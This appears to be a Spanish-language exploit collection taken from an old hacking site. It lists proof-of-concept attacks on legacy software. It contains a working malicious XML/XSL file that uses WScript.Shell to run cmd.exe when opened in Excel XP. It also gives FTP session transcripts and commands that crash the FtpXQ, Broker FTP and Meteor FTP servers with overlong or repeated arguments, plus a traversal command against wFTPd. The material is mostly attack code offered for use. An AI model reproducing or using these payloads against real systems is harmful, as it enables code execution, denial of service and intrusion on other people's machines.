* Excel XP xml stylesheet problems
http://www.guninski.com/ex$el2.html

Visualizar ( ejecutar ) un archivo .xls .xml puede provocar la ejecucion de
codigo arbitrario...
::Exploit::
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="" target="l">http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
[ Guardar como algo.xml - Reemplazar ? con / ]

* Servidores FTP
*Ftp XQ
http://www.datawizard.net/Support/FtpXQ/ftpxq.htm

::Exploit::
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.98).
User (xxxxxxxxx.rh.rit.edunone)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> MKD AAAAAAAAAAAAA.....AAAA

[Mas de 254 caracteres, cuelga el servidor. ]

*Broker FTP
http://www.transsoft.com/

::Exploit::
$ ftp example.com
Connected to example.com.
220 TransSoft's Broker FTP Server. (Version 5.0).
User (example.com(none)): test
331 OK need password.
Password:
230 Welcome to TransSoft's Broker FTP Server 5.0
ftp> cwd ...
[ Enviar este comando varias, veces, causa un cuelgue en el servidor [DoS ]]

*Meteor FTP
http://207.202.218.172/

::Exploit::
[ Loguearse, Enviar un comando junto varios caracteres "A", el server
caera. ]
MKD AAAAAAAAAAAAA...AAAA
STOR AAAAAAAAAAAA...AAAA

*wFTPd
http://www.wftpd.com/

::Exploit:: [ Bug Transversal ]
Loguearse y tirar el comando;
CWD ...



Fuente
http://www.lacovacha.cjb.net